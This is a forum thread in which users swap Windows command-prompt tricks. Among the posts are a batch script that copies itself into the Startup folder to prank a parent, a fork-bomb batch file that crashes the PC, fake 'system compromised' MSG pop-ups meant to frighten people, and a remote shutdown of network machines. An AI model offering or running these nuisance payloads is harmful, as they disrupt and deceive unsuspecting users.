FRIHOST FORUMS SEARCH FAQ TOS BLOGS COMPETITIONS
You are invited to Log in or Register a free Frihost Account!

CMD prompt

speeDemon
Does anywone know anything cool we could do using command prompt(CMD) in windows XP and Vista..?

I personally found some simple scripts to make the computer restart each time it would open, and there was even one which could reformat the computer...
?Have ou read/made any such scripts? well... post them!
Stolich
"Net send" when you're in class and bored is a classic one...
AftershockVibe
You don't need scripts to do that.

Restart can be done with:
shutdown -r -t 01

Format can be done with:
format <drive>

As Stolich pointed out, net send is a classic. If you have a computer that's old enough you can implement a (very) basic chat client in batch files. There's also the classic fork bomb trick, which isn't very useful but is quite cool when you realise what it's doing and why.
anasash
You could also do some funny pranks on your friends by trying the following in notepad..... :

MSG * FIREWALL DISABLED
MSG * HOST CONTROLLER ACCESS GAINED
MSG * SUPPORT MODE ACTIVATED
MSG * hello Smile
MSG * now i have conrol of your computer
MSG * ill get what i need and go, thanks for your stupidity
MSG * thanks for your credit card recipts, numbers and password
MSG * christmas has come early for me
MSG * HOST CONTROLLER DISCONECTED msg: thanks

save it in the anything.bat format......!

still lookes completely fake, but to the stupid their scared outa their pants..........
Flarkis
I have made a bunch of command like C applications, though most of them are hardly 'interesting'. They do things like manipulate wordlists or check for UPnP on a router.
Marcuzzo
speeDemon wrote:
Does anywone know anything cool we could do using command prompt(CMD) in windows XP and Vista..?

I personally found some simple scripts to make the computer restart each time it would open, and there was even one which could reformat the computer...
?Have ou read/made any such scripts? well... post them!

I don't think you can format your System drive from the commandline or even a batch file...

you can do a lot.
like I once fooled my dad with something like
Code:
@echo off
copy %0 "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\test.bat"
FOR %%A IN (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18) DO mkdir "%%A I am an idiot"

I had him go mad for over a month Laughing
SkyWalker59
For Commands related to cmd in any Windows Operating System
Start RUN then type cmd and Click Ok. In command Line just type help and Enter you will get all commands required for normal functioning.
Fire Boar
SkyWalker59 wrote:
Start RUN then type cmd and Click Ok. In command Line just type help and Enter you will get all commands required for normal functioning.

That's not really a "cool trick" though, is it now?
rickylau
Fire Boar wrote:
SkyWalker59 wrote:

That's not really a "cool trick" though, is it now?
It's not really a "cool trick" for "everyone", maybe it's cool enough for some users that are too used to Windows' GUI though.
Stubru Freak
A "cool trick" is to install cygwin, so you can have the power of a Linux command-line on Windows.
Marcuzzo
Stubru Freak wrote:
A "cool trick" is to install cygwin, so you can have the power of a Linux command-line on Windows.

or MSYS...
I used it a while ago to build ffmpeg
Diablosblizz
Little old, but Windows can't be formatted while the system is in use. Now.. I vaguely remember something called a "floppy" that could run DOS and could be done that way.

Seriously though, floppies... wow. Technology is advancing pretty quickly.
ProwerBot
Diablosblizz wrote:
Little old, but Windows can't be formatted while the system is in use. Now.. I vaguely remember something called a "floppy" that could run DOS and could be done that way.

Seriously though, floppies... wow. Technology is advancing pretty quickly.

lol, they still use floppy disks for some of the machines at my doctors office.

I always thought it was fun to type dir/s on command prompt and watch all the files go by (:
welshsteve
I remember a piece of javascript donkeys years ago that just opened new window after new window, eventually causing the PC to blue screen. That was funny.
Flakky
This is a simple script to crash your computer. Don't complain if it works Razz
Code:
:1
START /high %0
GOTO 1

Save as bat file, name of the file should not even bother.
This launches itself and repeats, of which all instances launch itself again. Eventually it will show a message it can not launch a new one but all running instances repeat to run more.
Strange flashes appear, taskbar goes wild and only option is the power button.
Combine with the code that Marcuzzo supplied for maximum annoyance
hersandal
I think the cool trick you could do with the command prompt is the shutdown cmd where you can shutdown the pc on your network if you the specific IP addresses of the computer. I have tried this before when I was still working as IT and if ever somebodies using the production PC which are not related to their work, I can just send a command to that computer and Shutdown that computer. The user will just wonder what happen on his machine.
debjitbiswas
well you can write anything log file like this
ping ***.***.***.*** >c:\debjit.txt
open the file and you got the result written in a notepad.
i use it and found very good and working fine.